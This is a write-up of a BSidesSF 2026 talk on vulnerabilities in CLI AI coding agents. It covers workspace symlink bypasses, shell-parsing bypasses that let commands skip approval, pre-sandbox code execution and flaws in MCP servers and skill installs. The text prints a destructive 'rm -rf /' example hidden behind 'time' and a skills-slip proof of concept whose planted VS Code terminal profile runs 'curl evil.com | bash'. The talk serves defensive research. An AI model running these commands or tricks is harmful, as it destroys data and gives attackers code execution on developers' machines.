Not My Vibe: When AI Coding Agents Go Off the Rails
Aonan Guan (Security Engineer · Wise Lives), Zhengyu Liu (PhD Student · Johns Hopkins University)
BSidesSF 2026 · Day 1 · AMC Theatre 14
Overview
In an era where AI coding agents are rapidly becoming indispensable tools for developers, the talk "Not My Vibe: When AI Coding Agents Go Off the Rails" by Aonan Guan and Zhengyu Liu (with contributions from Gavin, an independent researcher) presented a sobering look at the inherent security vulnerabilities in these increasingly autonomous systems. The speakers, all deeply involved in AI security research, shared insights from their systematic study of CLI-based agents like Google Gemini CLI and Cloud Code, revealing a landscape rife with bypasses and design flaws.

Key moments
- 0:30 What happens when AI coding agents go wrong?
- 2:40 As agents become autonomous, new attack surfaces emerge.
- 3:00 Understanding the 5-step architecture of CLI agents.
- 5:20 Three categories of attack vectors influencing agent behavior.
- 6:00 Real-world supply chain issues in AI agents.
- 7:30 The CWD trust boundary: What can go wrong?
- 8:00 Path checking flaws: Prefix tracking and symlink bypass.
Not My Vibe: When AI Coding Agents Go Off the Rails
Speakers: Aonan Guan, Security Engineer, Wise Lives; Zhengyu Liu, PhD Student, Johns Hopkins University
Conference: BSides SF
YouTube: https://www.youtube.com/watch?v=ES2oO6Md9g4
Overview
In an era where AI coding agents are rapidly becoming indispensable tools for developers, the talk "Not My Vibe: When AI Coding Agents Go Off the Rails" by Aonan Guan and Zhengyu Liu (with contributions from Gavin, an independent researcher) presented a sobering look at the inherent security vulnerabilities in these increasingly autonomous systems. The speakers, all deeply involved in AI security research, shared insights from their systematic study of CLI-based agents like Google Gemini CLI and Cloud Code, revealing a landscape rife with bypasses and design flaws.
The core of their presentation highlighted how the very features that make AI agents powerful—their ability to interpret natural language, write code, and execute commands—also introduce significant attack surfaces. As agents evolve from simple autocompletion to highly autonomous "YOLO mode" operation, the potential for security exploits grows exponentially. The talk underscored that the perceived magic of AI coding can quickly turn into a nightmare when these agents are tricked into executing malicious commands or compromising the developer's environment, often without explicit user approval.
This research matters profoundly for anyone leveraging AI in their development workflow, from individual developers to large enterprises. The speakers' findings, which led to multiple bounties and CVEs reported to Google and Anthropic, demonstrate that the security models of these tools are still maturing, often playing a "wack-a-mole" game against persistent attackers. Understanding these vulnerabilities is critical for adopting AI agents responsibly and for driving the industry towards more secure-by-default and transparent designs.
Background
▶ Watch: What happens when AI coding agents go wrong? (0:30)
The evolution of AI coding agents has been swift, moving from basic autocomplete in 2024 to integrated development environment (IDE) extensions that prompt for "yes/no" approval in 2025. The current trend is towards highly autonomous "YOLO mode," where agents execute actions without explicit user consent, and beyond, envisioning agents taking over entire IDEs and workflows. This escalating autonomy, as the speakers emphasized, directly correlates with an expanded and more exploitable security surface. Every new capability an agent gains is a new potential attack vector.
CLI agents, the focus of this research, operate on a relatively simple five-step model:
- A user launches the agent in their current working directory (CWD), establishing the agent's initial trusted boundary.
- The user provides a natural language prompt (e.g., "fix this bug").
- The prompt is sent to a remote Large Language Model (LLM).
- The LLM responds with an actionable command or file modification request.
- A local LLM agent harness parses this response into an executable tool call, which then typically asks for user permission before execution. This local agent acts as the "gatekeeper" between the LLM's intention and the actual system.
The architecture of Google's Gemini CLI, for instance, involves a user loop for input and approval, and an agent loop that communicates with the LLM, processes tool requests through a policy engine, and routes output. The critical path for potential vulnerabilities lies in the flow from the LLM response through the policy engine to tool execution. Many vulnerabilities arise from bypassing components along this path.
A key risk factor, often overlooked, is that AI agents rarely start from a clean state. When an agent is launched in a cloned repository, it inherits the project's structure, including markdown files, configuration files, and even files like cloud_directory_skill_files (a real example from Gemini CLI's system prompt) that can be embedded into the agent's system prompt. This means external files can significantly influence an agent's behavior. The attack surface extends beyond files in the workspace to dynamically retrieved content (e.g., read_file, web fetches) and extended surfaces like Message Passing Interface (MCP) servers or agent skills that add new tools and capabilities. Each of these represents a new trust boundary that the agent might cross without the user's full understanding.
Key Findings
▶ Watch: Understanding the 5-step architecture of CLI agents. (3:00)
The research presented was not theoretical but based on a systematic empirical study of real-world AI coding agents, specifically Google Gemini CLI and Cloud Code. The speakers conducted a version-by-version source code analysis, tracking architectural evolution and identifying vulnerabilities, some of which they discovered and others reported by fellow researchers. This deep dive revealed several critical findings:
- CWD as a Fragile Trust Boundary: The initial concept of restricting agent actions to the current working directory (CWD) is fundamentally sound but incredibly difficult to implement securely. Simple path checking functions like
is_within_rootsin Gemini CLI were repeatedly bypassed due to issues like prefix matching flaws and, most notably, symbolic link bypasses. These issues allowed agents to be tricked into accessing or modifying files outside the intended project scope.
- The "Shell Parsing is a Losing Game": A central finding was the immense difficulty, if not impossibility, of securely parsing and validating shell commands. Unlike file manipulation tools that enforce CWD boundaries, shell tools (e.g.,
cat,rm) can execute arbitrary commands with infinite variations. Early attempts at parsing shell commands with simple string splits or even more advanced regular expressions were consistently bypassed. Even after Google invested nine months in implementing Tree-sitter, a robust compiler-level parser, sophisticated bypasses like thetimecommand injection (fixed in Gemini CLI v0.2.9) continued to emerge. This "wack-a-mole" game highlights that attackers only need one successful bypass, while defenders must cover all edge cases. Cloud Code alone saw 9 different shell command bypasses, leading to 9 CVEs.
- Sandboxing: Necessary but Not a Silver Bullet: While sandboxing is a crucial defense mechanism, the talk revealed its limitations. Different agents implement sandboxes with varying levels of restrictiveness (e.g., CodeX's sandbox-first approach vs. Gemini CLI and Cloud Code's disabled-by-default models). Furthermore, sandboxes themselves can contain vulnerabilities, as demonstrated by a Cloud Code bug where an empty allowlist for network connections was misinterpreted as allowing all connections. Even when robust, sandboxes primarily protect the current session's runtime. They often fail to protect against attacks that modify configuration files to compromise future sessions, leading to time-of-check-time-of-use (TOCTOU)-like issues.
- "Trust Before Trust" Problem: A significant finding was the existence of vulnerabilities that allow code execution before the agent's sandbox even starts or before the user explicitly trusts a workspace. Examples include Cloud Code running
yarn versionorgit config user.emailduring startup, which can load malicious plugins fromyarnrc.ymlor inject commands via controlleduser.emailvalues. This pre-sandbox execution bypasses all runtime protections.
- Extended Surfaces Introduce New Attack Vectors: Agent extensions like MCP servers and Skills significantly expand capabilities but also introduce new attack surfaces. MCP servers, often running as separate, long-lived processes, are outside the agent's sandbox jurisdiction. Vulnerabilities in these servers (e.g., file system MCP server, Git MCP server, memory MCP server) often mirror classic injection and path traversal issues found in the core agents. Similarly, the installation processes for MCP bundles and Skills were susceptible to zip slip and Skills slip vulnerabilities, allowing attackers to write arbitrary files to arbitrary paths on the system, even before the agent is run.
In summary, the key findings illustrate a rapidly evolving threat landscape where the convenience and power of AI coding agents come with substantial security trade-offs. The progression of defenses, from simple path checks to compiler-level parsing and sandboxing, is constantly met by new, creative bypasses, indicating a fundamental challenge in securing highly interactive and autonomous code-generating systems.
Technical Deep Dive
▶ Watch: Three categories of attack vectors influencing agent behavior. (5:20)
The technical deep dive of the talk meticulously traced the evolution of security measures and their bypasses in AI coding agents, primarily focusing on Google Gemini CLI and Cloud Code. The speakers demonstrated how seemingly robust security concepts, like using the CWD as a trust boundary, proved challenging to implement correctly and were repeatedly circumvented.
The initial security model for CLI agents relied on the current working directory (CWD) as the primary security boundary. The expectation was that an agent launched within a project directory should only interact with files within that directory. Early versions of agents, such as Gemini CLI from July 2025, implemented functions like is_within_roots to enforce this. This function would check if any file operation (globbing, reading, editing, writing) was contained within the CWD.
However, this seemingly straightforward check was vulnerable. One common bypass involved prefix checking, where if a malicious path shared a common prefix with the CWD, it could be mistakenly approved. A more significant and recurring vulnerability was the symbolic link bypass. Attackers could create a soft link from a file within the CWD to a file outside the CWD (e.g., /etc/passwd). The agent's path-checking logic would see the symbolic link as being within the CWD and allow the operation, effectively tricking the agent into accessing sensitive files. This issue, initially found in Cloud Code in 2025 (CVEs were assigned) and again in 2026, was also discovered by the researchers in Gemini CLI, although Google did not assign a CVE.
A more fundamental problem emerged with the shell tool. While file manipulation tools (like read_file, edit_file) were designed to enforce CWD boundaries, the shell tool, which allows agents to run arbitrary commands (e.g., cat, ls, rm), often did not. For example, an attempt to read_file outside the CWD would be rejected, but executing cat /etc/passwd via the shell tool might not trigger the same CWD check, allowing arbitrary file reading or execution. The challenge here is immense: a single shell command can have infinite variations (e.g., cat, cat -n, cat /tmp/file), and these can be chained, substituted, or obfuscated in complex ways.
The speakers highlighted the arduous journey of Gemini CLI's shell parsing logic:
- Early Version (v0.1.8): All shell parsing was in-line, a mere 115 lines of code. This was easily bypassed using simple semicolon injection, where
command1; malicious_commandwould execute both without separate approval for the malicious part. - Later v0.1.8: Google added a dedicated function
detect_command_substitutionto catch common patterns like$(command), `command, and process substitution<(command)`. However, this implementation was incomplete; it could detect the left bracket of a process substitution but missed the right bracket, allowing for bypasses that the researchers reported and Google subsequently fixed. - Transition to Tree-sitter (July to October, then 6 more months): Recognizing the futility of regex-based parsing, Google made a significant investment, adopting Tree-sitter. Tree-sitter is a robust, compiler-level parser used in VS Code for syntax highlighting, capable of understanding the full bash grammar, including complex process arguments and string manipulations. This was a massive upgrade, but even with Tree-sitter, vulnerabilities persisted.
timecommand bypass (Gemini CLI v0.2.8, fixed Feb 2026 in v0.2.9): Thetimecommand, used to measure command performance, was fundamentally trusted. If an attacker appended a malicious command aftertime(e.g.,time python -c "import os; os.system('rm -rf /')"), Gemini CLI would trust the entire string becausetimewas the root command it identified. This allowed a malicious command to execute without explicit user approval.
This evolutionary path, spanning over nine months for Google to achieve proper compiler-level parsing, vividly illustrated the "wack-a-mole" nature of securing shell command execution. Cloud Code, for instance, had 9 different shell command bypasses leading to 9 CVEs. The pattern was clear: defense depends on addressing specific attack vectors, but attackers consistently find new edge cases.
Beyond the core agent, the talk delved into extended surfaces:
- MCP Servers (Message Passing Interface): These are separate, long-running services (e.g., Playwright server for browser automation, GitHub MCP) that agents communicate with via protocols. Crucially, because MCP servers run as independent processes, the agent's sandbox has no jurisdiction over them. This means vulnerabilities in MCP servers, often classic injection problems, can be exploited even if the agent itself is sandboxed. Examples included file system MCP server vulnerabilities (symbolic link handling, colluding path prefixes—mirroring agent CWD bypasses), Git MCP server vulnerabilities (arbitrary file creation via
git init, argument injection ingit difffor file override, path traversal ingit add), and memory MCP server vulnerabilities (loose JSON schema checks allowing arbitrary JSON file writes via attacker-controlled paths). - Skills: These are packages of instructions and optional code that teach agents task-specific workflows. While skills are eventually executed using bash tools, which can be sandboxed, their distribution and installation processes introduced another class of vulnerabilities.
The "trust before trust" problem highlighted situations where code executes before the sandbox is active or a trust decision is made. Cloud Code, for example, would run yarn version at startup to check the environment. If a malicious yarnrc.yml file with plugins was present in the workspace, it would be loaded and executed. Similarly, reading git config user.email could be exploited if the user.email contained a command injection payload. These pre-sandbox execution vectors mean that the agent's runtime protections are entirely bypassed.
Demo / Proof of Concept
▶ Watch: The CWD trust boundary: What can go wrong? (7:30)
The talk featured a compelling proof of concept demonstrating the Skills Slip vulnerability in Gemini CLI, a variant of the classic zip slip attack. This vulnerability allows an attacker to write arbitrary files to arbitrary locations on a user's system during the skill installation process, even before the agent itself runs within a sandbox.
The demonstration outlined the following attack flow:
- Malicious Skill Creation: An attacker crafts a "skill" (a package of instructions and code) with a specially crafted name. This skill name incorporates path traversal patterns, such as
../../../../.vscode/extensions/malicious-skill-name. - Internal Malicious Payload: Inside this malicious skill package, the attacker includes a
settings.jsonfile. Thissettings.jsonis designed to exploit VS Code workspace hijacking. It leverages VS Code'sterminal.integrated.profiles.osxsetting (or similar platform-specific settings) to define a custom terminal profile that executes a malicious command upon startup. For instance, it might define a profile that runscurl evil.com | bash, effectively downloading and executing arbitrary code. - Skill Installation: The victim uses the Gemini CLI command
gmi skills install /path/to/malicious_skill.zip. - Path Traversal Execution: The Gemini CLI, in its installation process, blindly trusts the skill's name and concatenates it with the target installation directory. Due to the path traversal patterns in the skill name, the
settings.jsonfile is copied not to the intended skill directory, but to a critical VS Code configuration directory (e.g.,~/.vscode/settings.jsonor a workspace-specific one). - Pre-Runtime Hijacking: The Gemini CLI does alert the user that "untrusted skills may affect the agent's runtime by running malicious commands." However, this warning is insufficient because the attack has already succeeded before the agent's runtime. The malicious
settings.jsonis now in place. - Terminal Hijacking: When the victim next launches a terminal within VS Code, the malicious profile defined in the injected
settings.jsonis activated. This executes the attacker's payload (e.g.,curl evil.com | bash), demonstrating arbitrary code execution on the victim's system.
The short video shown during the talk vividly illustrated this process. It showed the gmi skills install command succeeding, the alert about untrusted skills appearing, and then, crucially, a new terminal being launched in VS Code, immediately executing the attacker's injected command. This PoC effectively highlighted the "trust before trust" problem, demonstrating how vulnerabilities in the installation or bootstrapping process can bypass all subsequent runtime security measures, including sandboxing.
Defensive Implications
▶ Watch: Path checking flaws: Prefix tracking and symlink bypass. (8:00)
The detailed analysis of AI coding agent vulnerabilities presented in this talk offers crucial insights for both individual users and platform developers. The speakers provided a set of actionable recommendations to mitigate the risks associated with these powerful, yet potentially dangerous, tools.
For Users:
- Do Not Blindly Trust Agents and Avoid YOLO Mode: The most critical advice is to never use "YOLO mode" or "auto-approve mode" for production or sensitive tasks. These modes disable the human approval step, which is the last line of defense. Treat autonomous modes as experimental or for low-stakes testing environments. Always maintain a human approval step, especially when the agent interacts with critical repositories or sensitive files.
- Audit Your Context Files: Be acutely aware that files within your workspace (e.g.,
agent.md, configuration files,.gitconfigs,yarnrc.yml) can significantly influence the agent's behavior. Many of these are embedded directly into the system prompt or read during bootstrapping. Malicious context files can effectively "prompt inject" the agent from the local environment, instructing it to perform harmful actions. Regularly audit these files, especially in untrusted repositories. - Verify Commands at Runtime: When an agent proposes a command, do not approve it if it's too complex or opaque to parse at a glance. Shell commands, as demonstrated, can be highly complex and contain hidden malicious payloads. If you cannot fully understand what a command will do, it's safer not to run it.
- Use Sandboxing by Default: While not a perfect solution, enabling sandboxing (e.g., with
--sandboxflag in Gemini CLI) by default is a significant improvement. Accept that you may encounter more errors initially, as the sandbox restricts agent actions. Over time, you can incrementally adjust the sandbox policies to balance functionality and security for your specific workflow. Even imperfect sandboxes offer a layer of protection that is absent without them.
For Developers and Platform Providers:
- Prioritize "Secure by Default": Agent platforms should enable sandboxing and human approval steps by default, rather than making them opt-in. The current industry trend often favors convenience over security, pushing users towards less secure modes.
- Enhance Auditable and Transparent Agents: Developers need better tools and mechanisms to understand exactly what an agent is doing, why it's doing it, and what commands it intends to execute. This includes clearer parsing and presentation of shell commands, better CWD and network activity logging, and more robust policy engines.
- Robust and Trustworthy Agent Systems: The core challenge of securely parsing shell commands and managing trust boundaries requires continuous, significant investment, as demonstrated by Google's multi-month effort with Tree-sitter. This extends to securing all "extended surfaces" like MCP servers and skill installation processes, ensuring they are not susceptible to classic vulnerabilities like path traversal or command injection.
- Address "Trust Before Trust" Issues: Critical attention must be paid to the agent's bootstrapping and initialization phases. Any code execution or file reading that occurs before the main agent loop or sandbox is active represents a significant bypass vector that must be secured.
The speakers concluded by acknowledging that stopping prompt and command injection in AI agents feels like an "endless game" due to the constantly expanding attack surface. However, by adopting these defensive strategies and pushing for more secure-by-default, auditable, and transparent agent systems, the industry can strive to deliver both functionality and security in the future.
Key Takeaways
- AI Coding Agents Expand Attack Surface: The increasing autonomy of AI coding agents, particularly in "YOLO mode," significantly broadens the potential for security exploits, turning every new capability into a new attack vector.
- Basic Security is Surprisingly Hard: Core security concepts like enforcing current working directory (CWD) boundaries and securely parsing shell commands are extremely complex to implement correctly, leading to repeated vulnerabilities such as symbolic link bypasses and various forms of command injection.
- Sandboxing is Essential but Imperfect: While crucial for containing agent actions, sandboxes can have their own vulnerabilities (e.g., network policy bypasses) and often fail to protect against pre-runtime execution or attacks that persist across sessions ("trust before trust" problems).
- Extended Surfaces Introduce New Risks: Agent extensions like MCP servers and Skills, while enhancing functionality, introduce new attack vectors that often replicate classic vulnerabilities (e.g., path traversal, zip slip) in new contexts, operating outside the primary agent's sandbox.
- The "Wack-a-Mole" Game of Defense: Defenders face an uphill battle, needing to cover all possible edge cases and attack vectors, whereas attackers only need to find one successful bypass, leading to a continuous cycle of vulnerability discovery and patching.
- User Vigilance and Platform Responsibility are Key: Users must exercise extreme caution, avoid blind trust, never use YOLO mode for critical tasks, audit context files, verify commands, and enable sandboxes. Concurrently, platform developers must prioritize "secure by default" designs, enhance agent auditability and transparency, and invest heavily in robust security architectures from bootstrapping to extended functionalities.
About the Speaker(s)
The talk was presented by Aonan Guan, a Security Engineer at Wise Lives, and Zhengyu Liu, a PhD student at Johns Hopkins University. They were joined in their research efforts by Gavin, an independent researcher who contributed significantly to the work but was unable to attend the conference.
Together, this team has conducted deep-dive security research specifically on CLI-based AI coding agents over the past year. Their work has been instrumental in identifying and reporting multiple vulnerabilities in prominent platforms, including Google Gemini CLI and Anthropic's Cloud Code, leading to the receipt of several bug bounties. Their approach is unique, combining endpoint fuzzing with a systematic study of source code evolution, tracing how security architectures have developed from early versions to current releases.
Reviews
Dr. Zero (Offensive Security Researcher) — STRONG ACCEPT
Solid empirical security research on a target that genuinely matters right now — CLI-based AI coding agents — with real CVEs, real bounties, and a systematic version-by-version methodology that shows the authors actually did the work. The shell parsing evolution story alone (regex → Tree-sitter → still broken) is a convincing argument that this attack class is structurally hard, not just poorly patched.
Heather Calloway (CISO) — WEAK
Technically credible research with real CVEs and a coherent empirical methodology — but it stops at the developer workstation and never connects to the organizational risk picture. Security leaders deploying AI coding tools at scale get no policy framework, no procurement guidance, and no governance model from this talk.